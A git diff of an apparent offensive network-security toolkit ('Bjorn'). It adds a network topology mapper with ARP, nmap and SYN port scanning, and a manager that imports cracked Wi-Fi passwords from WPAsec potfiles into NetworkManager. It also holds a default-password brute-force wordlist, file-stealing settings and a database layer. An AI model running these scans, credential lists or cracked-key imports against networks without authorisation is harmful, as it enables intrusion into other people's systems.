with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()

335
actions/yggdrasil_mapper.py Normal file
View File

@@ -0,0 +1,335 @@
# Network topology mapping tool for discovering and visualizing network segments.
# Saves settings in `/home/bjorn/.settings_bjorn/yggdrasil_mapper_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -r, --range Network range to scan (CIDR format).
# -i, --interface Network interface to use (default: active interface).
# -d, --depth Maximum trace depth for routing (default: 5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/topology).
# -t, --timeout Timeout for probes in seconds (default: 2).
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import networkx as nx
import matplotlib.pyplot as plt
import nmap
import scapy.all as scapy
from scapy.layers.inet import IP, ICMP, TCP
import threading
import queue
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/topology"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "yggdrasil_mapper_settings.json")
class YggdrasilMapper:
def __init__(self, network_range, interface=None, max_depth=5, output_dir=DEFAULT_OUTPUT_DIR, timeout=2):
self.network_range = network_range
self.interface = interface or scapy.conf.iface
self.max_depth = max_depth
self.output_dir = output_dir
self.timeout = timeout
self.graph = nx.Graph()
self.hosts = {}
self.routes = {}
self.lock = threading.Lock()
# For parallel processing
self.queue = queue.Queue()
self.results = queue.Queue()
def discover_hosts(self):
"""Discover live hosts in the network range."""
try:
logging.info(f"Discovering hosts in {self.network_range}")
# ARP scan for local network
arp_request = scapy.ARP(pdst=self.network_range)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
packets = broadcast/arp_request
answered, _ = scapy.srp(packets, timeout=self.timeout, iface=self.interface, verbose=False)
for sent, received in answered:
ip = received.psrc
mac = received.hwsrc
self.hosts[ip] = {'mac': mac, 'status': 'up'}
logging.info(f"Discovered host: {ip} ({mac})")
# Additional Nmap scan for service discovery
nm = nmap.PortScanner()
nm.scan(hosts=self.network_range, arguments=f'-sn -T4')
for host in nm.all_hosts():
if host not in self.hosts:
self.hosts[host] = {'status': 'up'}
logging.info(f"Discovered host: {host}")
except Exception as e:
logging.error(f"Error discovering hosts: {e}")
def trace_route(self, target):
"""Perform traceroute to a target."""
try:
hops = []
for ttl in range(1, self.max_depth + 1):
pkt = IP(dst=target, ttl=ttl)/ICMP()
reply = scapy.sr1(pkt, timeout=self.timeout, verbose=False)
if reply is None:
continue
if reply.src == target:
hops.append(reply.src)
break
hops.append(reply.src)
return hops
except Exception as e:
logging.error(f"Error tracing route to {target}: {e}")
return []
def scan_ports(self, ip):
"""Scan common ports on a host."""
try:
common_ports = [21, 22, 23, 25, 53, 80, 443, 445, 3389]
open_ports = []
for port in common_ports:
tcp_connect = IP(dst=ip)/TCP(dport=port, flags="S")
response = scapy.sr1(tcp_connect, timeout=self.timeout, verbose=False)
if response and response.haslayer(TCP):
if response[TCP].flags == 0x12: # SYN-ACK
open_ports.append(port)
# Send RST to close connection
rst = IP(dst=ip)/TCP(dport=port, flags="R")
scapy.send(rst, verbose=False)
return open_ports
except Exception as e:
logging.error(f"Error scanning ports for {ip}: {e}")
return []
def worker(self):
"""Worker function for parallel processing."""
while True:
try:
task = self.queue.get()
if task is None:
break
ip = task
hops = self.trace_route(ip)
ports = self.scan_ports(ip)
self.results.queue.put({
'ip': ip,
'hops': hops,
'ports': ports
})
self.queue.task_done()
except Exception as e:
logging.error(f"Worker error: {e}")
self.queue.task_done()
def build_topology(self):
"""Build network topology by tracing routes and scanning hosts."""
try:
# Start worker threads
workers = []
for _ in range(5): # Number of parallel workers
t = threading.Thread(target=self.worker)
t.start()
workers.append(t)
# Add tasks to queue
for ip in self.hosts.keys():
self.queue.put(ip)
# Add None to queue to stop workers
for _ in workers:
self.queue.put(None)
# Wait for all workers to complete
for t in workers:
t.join()
# Process results
while not self.results.empty():
result = self.results.get()
ip = result['ip']
hops = result['hops']
ports = result['ports']
self.hosts[ip]['ports'] = ports
if len(hops) > 1:
self.routes[ip] = hops
# Add nodes and edges to graph
self.graph.add_node(ip, **self.hosts[ip])
for i in range(len(hops) - 1):
self.graph.add_edge(hops[i], hops[i + 1])
except Exception as e:
logging.error(f"Error building topology: {e}")
def generate_visualization(self):
"""Generate network topology visualization."""
try:
plt.figure(figsize=(12, 8))
# Position nodes using spring layout
pos = nx.spring_layout(self.graph)
# Draw nodes
nx.draw_networkx_nodes(self.graph, pos, node_size=500)
# Draw edges
nx.draw_networkx_edges(self.graph, pos)
# Add labels
labels = {}
for node in self.graph.nodes():
label = f"{node}\n"
if 'ports' in self.hosts[node]:
label += f"Ports: {', '.join(map(str, self.hosts[node]['ports']))}"
labels[node] = label
nx.draw_networkx_labels(self.graph, pos, labels, font_size=8)
# Save visualization
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
viz_path = os.path.join(self.output_dir, f"topology_{timestamp}.png")
plt.savefig(viz_path)
plt.close()
logging.info(f"Visualization saved to {viz_path}")
except Exception as e:
logging.error(f"Error generating visualization: {e}")
def save_results(self):
"""Save topology data to JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'network_range': self.network_range,
'hosts': self.hosts,
'routes': self.routes,
'topology': {
'nodes': list(self.graph.nodes()),
'edges': list(self.graph.edges())
}
}
output_file = os.path.join(self.output_dir, f"topology_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the network mapping process."""
try:
logging.info(f"Starting network mapping of {self.network_range}")
# Discovery phase
self.discover_hosts()
if not self.hosts:
logging.error("No hosts discovered")
return
# Topology building phase
self.build_topology()
# Generate outputs
self.generate_visualization()
self.save_results()
logging.info("Network mapping completed")
except Exception as e:
logging.error(f"Error during execution: {e}")
def save_settings(network_range, interface, max_depth, output_dir, timeout):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"network_range": network_range,
"interface": interface,
"max_depth": max_depth,
"output_dir": output_dir,
"timeout": timeout
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Network topology mapping tool")
parser.add_argument("-r", "--range", help="Network range to scan (CIDR)")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-d", "--depth", type=int, default=5, help="Maximum trace depth")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=2, help="Timeout for probes")
args = parser.parse_args()
settings = load_settings()
network_range = args.range or settings.get("network_range")
interface = args.interface or settings.get("interface")
max_depth = args.depth or settings.get("max_depth")
output_dir = args.output or settings.get("output_dir")
timeout = args.timeout or settings.get("timeout")
if not network_range:
logging.error("Network range is required. Use -r or save it in settings")
return
save_settings(network_range, interface, max_depth, output_dir, timeout)
mapper = YggdrasilMapper(
network_range=network_range,
interface=interface,
max_depth=max_depth,
output_dir=output_dir,
timeout=timeout
)
mapper.execute()
if __name__ == "__main__":
main()

1331
c2_manager.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,71 +1,342 @@
# comment.py
# This module defines the `Commentaireia` class, which provides context-based random comments.
# The comments are based on various themes such as "IDLE", "SCANNER", and others, to simulate
# different states or actions within a network scanning and security context. The class uses a
# shared data object to determine delays between comments and switches themes based on the current
# state. The `get_commentaire` method returns a random comment from the specified theme, ensuring
# comments are not repeated too frequently.
# Comments manager with database backend
# Provides contextual messages for display with timing control and multilingual support.
# comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
# Avec un texte DB du style: "Trying {user}@{ip} over SSH..."
import random
import os
import time
import logging
import json
import random
import locale
from typing import Optional, List, Dict, Any
from init_shared import shared_data
from logger import Logger
import os
logger = Logger(name="comment.py", level=logging.DEBUG)
logger = Logger(name="comment.py", level=20) # INFO
# --- Helpers -----------------------------------------------------------------
class _SafeDict(dict):
"""Safe formatter: leaves unknown {placeholders} intact instead of raising."""
def __missing__(self, key):
return "{" + key + "}"
def _row_get(row: Any, key: str, default=None):
"""Safe accessor for rows that may be dict-like or sqlite3.Row."""
try:
return row.get(key, default)
except Exception:
try:
return row[key]
except Exception:
return default
# --- Main class --------------------------------------------------------------
class CommentAI:
"""
AI-style comment generator for status messages with:
- Randomized delay between messages
- Database-backed phrases (text, status, theme, lang, weight)
- Multilingual search with language priority and fallbacks
- Safe string templates: "Trying {user}@{ip}..."
"""
class Commentaireia:
"""Provides context-based random comments for bjorn."""
def __init__(self):
self.shared_data = shared_data
self.last_comment_time = 0 # Initialize last_comment_time
self.comment_delay = random.randint(self.shared_data.comment_delaymin, self.shared_data.comment_delaymax) # Initialize comment_delay
self.last_theme = None # Initialize last_theme
self.themes = self.load_comments(self.shared_data.commentsfile) # Load themes from JSON file
def load_comments(self, commentsfile):
"""Load comments from a JSON file."""
cache_file = commentsfile + '.cache'
# Timing configuration with robust defaults
self.delay_min = max(1, int(getattr(self.shared_data, "comment_delaymin", 5)))
self.delay_max = max(self.delay_min, int(getattr(self.shared_data, "comment_delaymax", 15)))
self.comment_delay = self._new_delay()
# Check if a cached version exists and is newer than the original file
if os.path.exists(cache_file) and os.path.getmtime(cache_file) >= os.path.getmtime(commentsfile):
try:
with open(cache_file, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from cache.")
return comments_data
except (FileNotFoundError, json.JSONDecodeError):
logger.warning("Cache file is corrupted or not found. Loading from the original file.")
# State tracking
self.last_comment_time: float = 0.0
self.last_status: Optional[str] = None
# Load from the original file if cache is not used or corrupted
try:
with open(commentsfile, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from JSON file.")
# Save to cache
with open(cache_file, 'w') as cache:
json.dump(comments_data, cache)
return comments_data
except FileNotFoundError:
logger.error(f"The file '{commentsfile}' was not found.")
return {"IDLE": ["Default comment, no comments file found."]} # Fallback to a default theme
except json.JSONDecodeError:
logger.error(f"The file '{commentsfile}' is not a valid JSON file.")
return {"IDLE": ["Default comment, invalid JSON format."]} # Fallback to a default theme
# Ensure comments are loaded in database
self._ensure_comments_loaded()
def get_commentaire(self, theme):
""" This method returns a random comment based on the specified theme."""
current_time = time.time() # Get the current time in seconds
if theme != self.last_theme or current_time - self.last_comment_time >= self.comment_delay: # Check if the theme has changed or if the delay has expired
self.last_comment_time = current_time # Update the last comment time
self.last_theme = theme # Update the last theme
# Initialize first comment for UI using language priority
if not hasattr(self.shared_data, "bjorn_says") or not getattr(self.shared_data, "bjorn_says"):
first = self._pick_text("IDLE", lang=None, params=None)
self.shared_data.bjorn_says = first or "Initializing..."
if theme not in self.themes:
logger.warning(f"The theme '{theme}' is not defined, using the default theme IDLE.")
theme = "IDLE"
# --- Language priority & JSON discovery ----------------------------------
return random.choice(self.themes[theme]) # Return a random comment based on the specified theme
else:
def _lang_priority(self, preferred: Optional[str] = None) -> List[str]:
"""
Build ordered language preference list, deduplicated.
Priority sources:
1. explicit `preferred`
2. shared_data.lang_priority (list)
3. shared_data.lang (single fallback)
4. defaults ["en", "fr"]
"""
order: List[str] = []
def norm(x: Optional[str]) -> Optional[str]:
if not x:
return None
x = str(x).strip().lower()
return x[:2] if x else None
# 1) explicit override
p = norm(preferred)
if p:
order.append(p)
sd = self.shared_data
# 2) list from shared_data
if hasattr(sd, "lang_priority") and isinstance(sd.lang_priority, (list, tuple)):
order += [l for l in (norm(x) for x in sd.lang_priority) if l]
# 3) single language from shared_data
if hasattr(sd, "lang"):
l = norm(sd.lang)
if l:
order.append(l)
# 4) fallback defaults
order += ["en", "fr"]
# Deduplicate while preserving order
seen, res = set(), []
for l in order:
if l and l not in seen:
seen.add(l)
res.append(l)
return res
def _get_comments_json_paths(self, lang: Optional[str] = None) -> List[str]:
"""
Return candidate JSON paths, restricted to default_comments_dir (and explicit comments_file).
Supported patterns:
- {comments_file} (explicit)
- {default_comments_dir}/comments.json
- {default_comments_dir}/comments.<lang>.json
- {default_comments_dir}/{lang}/comments.json
"""
lang = (lang or "").strip().lower()
candidates = []
# 1) Explicit path from shared_data
comments_file = getattr(self.shared_data, "comments_file", "") or ""
if comments_file:
candidates.append(comments_file)
# 2) Default comments directory
default_dir = getattr(self.shared_data, "default_comments_dir", "")
if default_dir:
candidates += [
os.path.join(default_dir, "comments.json"),
os.path.join(default_dir, f"comments.{lang}.json") if lang else "",
os.path.join(default_dir, lang, "comments.json") if lang else "",
]
# Deduplicate
unique_paths, seen = [], set()
for p in candidates:
p = (p or "").strip()
if p and p not in seen:
seen.add(p)
unique_paths.append(p)
return unique_paths
# --- Bootstrapping DB -----------------------------------------------------
def _ensure_comments_loaded(self):
"""Ensure comments are present in DB; import JSON if empty."""
try:
comment_count = int(self.shared_data.db.count_comments())
except Exception as e:
logger.error(f"Database error counting comments: {e}")
comment_count = 0
if comment_count > 0:
logger.debug(f"Comments already in database: {comment_count}")
return
imported = 0
for lang in self._lang_priority():
for json_path in self._get_comments_json_paths(lang):
if os.path.exists(json_path):
try:
count = int(self.shared_data.db.import_comments_from_json(json_path))
imported += count
if count > 0:
logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
break # stop at first successful import
except Exception as e:
logger.error(f"Failed to import comments from {json_path}: {e}")
if imported > 0:
break
if imported == 0:
logger.debug("No comments imported, seeding minimal fallback set")
self._seed_minimal_comments()
def _seed_minimal_comments(self):
"""
Seed minimal set when no JSON available.
Schema per row: (text, status, theme, lang, weight)
"""
default_comments = [
# English
("Scanning network for targets...", "NetworkScanner", "NetworkScanner", "en", 2),
("System idle, awaiting commands.", "IDLE", "IDLE", "en", 3),
("Analyzing network topology...", "NetworkScanner", "NetworkScanner", "en", 1),
("Processing authentication attempts...", "SSHBruteforce", "SSHBruteforce", "en", 2),
("Searching for vulnerabilities...", "NmapVulnScanner", "NmapVulnScanner", "en", 2),
("Extracting credentials from services...", "CredExtractor", "CredExtractor", "en", 1),
("Monitoring network changes...", "IDLE", "IDLE", "en", 2),
("Ready for deployment.", "IDLE", "IDLE", "en", 1),
("Target acquisition in progress...", "NetworkScanner", "NetworkScanner", "en", 1),
("Establishing secure connections...", "SSHBruteforce", "SSHBruteforce", "en", 1),
# French (bonus minimal)
("Analyse du réseau en cours...", "NetworkScanner", "NetworkScanner", "fr", 2),
("Système au repos, en attente dordres.", "IDLE", "IDLE", "fr", 3),
("Cartographie de la topologie réseau...", "NetworkScanner", "NetworkScanner", "fr", 1),
("Tentatives dauthentification en cours...", "SSHBruteforce", "SSHBruteforce", "fr", 2),
("Recherche de vulnérabilités...", "NmapVulnScanner", "NmapVulnScanner", "fr", 2),
("Extraction didentifiants depuis les services...", "CredExtractor", "CredExtractor", "fr", 1),
]
try:
self.shared_data.db.insert_comments(default_comments)
logger.info(f"Seeded {len(default_comments)} minimal comments into database")
except Exception as e:
logger.error(f"Failed to seed minimal comments: {e}")
# --- Core selection -------------------------------------------------------
def _new_delay(self) -> int:
"""Generate new random delay between comments."""
delay = random.randint(self.delay_min, self.delay_max)
logger.debug(f"Next comment delay: {delay}s")
return delay
def _pick_text(
self,
status: str,
lang: Optional[str],
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Pick a weighted comment across language preference; supports {templates}.
Selection cascade (per language in priority order):
1) (lang, status)
2) (lang, 'ANY')
3) (lang, 'IDLE')
Then cross-language:
4) (any, status)
5) (any, 'IDLE')
"""
status = status or "IDLE"
langs = self._lang_priority(preferred=lang)
# Language-scoped queries
rows = []
queries = [
("SELECT text, weight FROM comments WHERE lang=? AND status=?", lambda L: (L, status)),
("SELECT text, weight FROM comments WHERE lang=? AND status='ANY'", lambda L: (L,)),
("SELECT text, weight FROM comments WHERE lang=? AND status='IDLE'", lambda L: (L,)),
]
for L in langs:
for sql, args_fn in queries:
try:
rows = self.shared_data.db.query(sql, args_fn(L))
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if rows:
break
# Cross-language fallbacks
if not rows:
for sql, args in [
("SELECT text, weight FROM comments WHERE status=? ORDER BY RANDOM() LIMIT 50", (status,)),
("SELECT text, weight FROM comments WHERE status='IDLE' ORDER BY RANDOM() LIMIT 50", ()),
]:
try:
rows = self.shared_data.db.query(sql, args)
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if not rows:
return None
# Weighted selection pool
pool: List[str] = []
for row in rows:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
w = max(1, w)
text = _row_get(row, "text", "")
if text:
pool.extend([text] * w)
chosen = random.choice(pool) if pool else _row_get(rows[0], "text", None)
# Templates {var}
if chosen and params:
try:
chosen = str(chosen).format_map(_SafeDict(params))
except Exception:
# Keep the raw text if formatting fails
pass
return chosen
# --- Public API -----------------------------------------------------------
def get_comment(
self,
status: str,
lang: Optional[str] = None,
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Return a comment if status changed or delay expired.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
params: optional dict to format templates with {placeholders}.
Returns:
str or None: A new comment, or None if not time yet and status unchanged.
"""
current_time = time.time()
status = status or "IDLE"
status_changed = (status != self.last_status)
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
text = self._pick_text(status, lang, params)
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
return text
return None
# Backward compatibility alias
Commentaireia = CommentAI

View File

View File

@@ -1,107 +0,0 @@
{
"__title_Bjorn__": "Settings",
"manual_mode": false,
"websrv": true,
"web_increment ": false,
"debug_mode": true,
"scan_vuln_running": false,
"retry_success_actions": false,
"retry_failed_actions": true,
"blacklistcheck": true,
"displaying_csv": true,
"log_debug": true,
"log_info": true,
"log_warning": true,
"log_error": true,
"log_critical": true,
"startup_delay": 10,
"web_delay": 2,
"screen_delay": 1,
"comment_delaymin": 15,
"comment_delaymax": 30,
"livestatus_delay": 8,
"image_display_delaymin": 2,
"image_display_delaymax": 8,
"scan_interval": 180,
"scan_vuln_interval": 900,
"failed_retry_delay": 600,
"success_retry_delay": 900,
"ref_width": 122,
"ref_height": 250,
"epd_type": "epd2in13_V4",
"__title_lists__": "List Settings",
"portlist": [
20,
21,
22,
23,
25,
53,
69,
80,
110,
111,
135,
137,
139,
143,
161,
162,
389,
443,
445,
512,
513,
514,
587,
636,
993,
995,
1080,
1433,
1521,
2049,
3306,
3389,
5000,
5001,
5432,
5900,
8080,
8443,
9090,
10000
],
"mac_scan_blacklist": [
"00:11:32:c4:71:9b",
"00:11:32:c4:71:9a"
],
"ip_scan_blacklist": [
"192.168.1.1",
"192.168.1.12",
"192.168.1.38",
"192.168.1.53",
"192.168.1.40",
"192.168.1.29"
],
"steal_file_names": [
"ssh.csv",
"hack.txt"
],
"steal_file_extensions": [
".bjorn",
".hack",
".flag"
],
"__title_network__": "Network",
"nmap_scan_aggressivity": "-T2",
"portstart": 1,
"portend": 2,
"__title_timewaits__": "Time Wait Settings",
"timewait_smb": 0,
"timewait_ssh": 0,
"timewait_telnet": 0,
"timewait_ftp": 0,
"timewait_sql": 0,
"timewait_rdp": 0
}

View File

@@ -1,3 +1,7 @@
root
admin
bjorn
password
toor
1234
123456

View File

@@ -0,0 +1 @@
42f5203400a6:b65b4c0befdf:pwned:deauther

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

View File

531
database.py Normal file
View File

@@ -0,0 +1,531 @@
# database.py
# Main database facade - delegates to specialized modules in db_utils/
# Maintains backward compatibility with existing code
import os
from typing import Any, Dict, Iterable, List, Optional, Tuple
from contextlib import contextmanager
from threading import RLock
import sqlite3
import logging
from logger import Logger
from db_utils.base import DatabaseBase
from db_utils.config import ConfigOps
from db_utils.hosts import HostOps
from db_utils.actions import ActionOps
from db_utils.queue import QueueOps
from db_utils.vulnerabilities import VulnerabilityOps
from db_utils.software import SoftwareOps
from db_utils.credentials import CredentialOps
from db_utils.services import ServiceOps
from db_utils.scripts import ScriptOps
from db_utils.stats import StatsOps
from db_utils.backups import BackupOps
from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
logger = Logger(name="database.py", level=logging.DEBUG)
_DEFAULT_DB = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data", "bjorn.db")
class BjornDatabase:
"""
Main database facade that delegates operations to specialized modules.
All existing method calls remain unchanged - they're automatically forwarded.
"""
def __init__(self, db_path: Optional[str] = None):
self.db_path = db_path or _DEFAULT_DB
os.makedirs(os.path.dirname(self.db_path), exist_ok=True)
# Initialize base connection manager
self._base = DatabaseBase(self.db_path)
# Initialize all operational modules (they share the base connection)
self._config = ConfigOps(self._base)
self._hosts = HostOps(self._base)
self._actions = ActionOps(self._base)
self._queue = QueueOps(self._base)
self._vulnerabilities = VulnerabilityOps(self._base)
self._software = SoftwareOps(self._base)
self._credentials = CredentialOps(self._base)
self._services = ServiceOps(self._base)
self._scripts = ScriptOps(self._base)
self._stats = StatsOps(self._base)
self._backups = BackupOps(self._base)
self._comments = CommentOps(self._base)
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
# Ensure schema is created
self.ensure_schema()
logger.info(f"BjornDatabase initialized: {self.db_path}")
# =========================================================================
# CORE PRIMITIVES - Delegated to base
# =========================================================================
@property
def _conn(self):
"""Access to underlying connection"""
return self._base._conn
@property
def _lock(self):
"""Access to thread lock"""
return self._base._lock
@property
def _cache_ttl(self):
return self._base._cache_ttl
@property
def _stats_cache(self):
return self._base._stats_cache
@_stats_cache.setter
def _stats_cache(self, value):
self._base._stats_cache = value
def _cursor(self):
return self._base._cursor()
def transaction(self, immediate: bool = True):
return self._base.transaction(immediate)
def execute(self, sql: str, params: Iterable[Any] = (), many: bool = False) -> int:
return self._base.execute(sql, params, many)
def executemany(self, sql: str, seq_of_params: Iterable[Iterable[Any]]) -> int:
return self._base.executemany(sql, seq_of_params)
def query(self, sql: str, params: Iterable[Any] = ()) -> List[Dict[str, Any]]:
return self._base.query(sql, params)
def query_one(self, sql: str, params: Iterable[Any] = ()) -> Optional[Dict[str, Any]]:
return self._base.query_one(sql, params)
def invalidate_stats_cache(self):
return self._base.invalidate_stats_cache()
# =========================================================================
# SCHEMA INITIALIZATION
# =========================================================================
def ensure_schema(self) -> None:
"""Create all database tables if missing"""
logger.info("Ensuring database schema...")
# Each module creates its own tables
self._config.create_tables()
self._actions.create_tables()
self._hosts.create_tables()
self._services.create_tables()
self._queue.create_tables()
self._stats.create_tables()
self._vulnerabilities.create_tables()
self._software.create_tables()
self._credentials.create_tables()
self._scripts.create_tables()
self._backups.create_tables()
self._comments.create_tables()
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
logger.info("Database schema ready")
# =========================================================================
# METHOD DELEGATION - All existing methods forwarded automatically
# =========================================================================
# Config operations
def get_config(self) -> Dict[str, Any]:
return self._config.get_config()
def save_config(self, config: Dict[str, Any]) -> None:
return self._config.save_config(config)
# Host operations
def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts()
def update_host(self, mac_address: str, ips: Optional[str] = None,
hostnames: Optional[str] = None, alive: Optional[int] = None,
ports: Optional[str] = None, vendor: Optional[str] = None,
essid: Optional[str] = None):
return self._hosts.update_host(mac_address, ips, hostnames, alive, ports, vendor, essid)
def merge_ip_stub_into_real(self, ip: str, real_mac: str,
hostname: Optional[str] = None, essid_hint: Optional[str] = None):
return self._hosts.merge_ip_stub_into_real(ip, real_mac, hostname, essid_hint)
def update_hostname(self, mac_address: str, new_hostname: str):
return self._hosts.update_hostname(mac_address, new_hostname)
def get_current_hostname(self, mac_address: str) -> Optional[str]:
return self._hosts.get_current_hostname(mac_address)
def record_hostname_seen(self, mac_address: str, hostname: str):
return self._hosts.record_hostname_seen(mac_address, hostname)
def list_hostname_history(self, mac_address: str) -> List[Dict[str, Any]]:
return self._hosts.list_hostname_history(mac_address)
def update_ips_current(self, mac_address: str, current_ips: Iterable[str], cap_prev: int = 200):
return self._hosts.update_ips_current(mac_address, current_ips, cap_prev)
def update_ports_current(self, mac_address: str, current_ports: Iterable[int], cap_prev: int = 500):
return self._hosts.update_ports_current(mac_address, current_ports, cap_prev)
def update_essid_current(self, mac_address: str, new_essid: Optional[str], cap_prev: int = 50):
return self._hosts.update_essid_current(mac_address, new_essid, cap_prev)
# Action operations
def sync_actions(self, actions):
return self._actions.sync_actions(actions)
def list_actions(self):
return self._actions.list_actions()
def list_studio_actions(self):
return self._actions.list_studio_actions()
def get_action_by_class(self, b_class: str) -> dict | None:
return self._actions.get_action_by_class(b_class)
def delete_action(self, b_class: str) -> None:
return self._actions.delete_action(b_class)
def upsert_simple_action(self, *, b_class: str, b_module: str, **kw) -> None:
return self._actions.upsert_simple_action(b_class=b_class, b_module=b_module, **kw)
def list_action_cards(self) -> list[dict]:
return self._actions.list_action_cards()
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
return self._actions.get_action_definition(b_class)
# Queue operations
def get_next_queued_action(self) -> Optional[Dict[str, Any]]:
return self._queue.get_next_queued_action()
def update_queue_status(self, queue_id: int, status: str, error_msg: str = None, result: str = None):
return self._queue.update_queue_status(queue_id, status, error_msg, result)
def promote_due_scheduled_to_pending(self) -> int:
return self._queue.promote_due_scheduled_to_pending()
def ensure_scheduled_occurrence(self, action_name: str, next_run_at: str,
mac: Optional[str] = "", ip: Optional[str] = "", **kwargs) -> bool:
return self._queue.ensure_scheduled_occurrence(action_name, next_run_at, mac, ip, **kwargs)
def queue_action(self, action_name: str, mac: str, ip: str, port: int = None,
priority: int = 50, trigger: str = None, metadata: Dict = None) -> None:
return self._queue.queue_action(action_name, mac, ip, port, priority, trigger, metadata)
def queue_action_at(self, action_name: str, mac: Optional[str] = "", ip: Optional[str] = "", **kwargs) -> None:
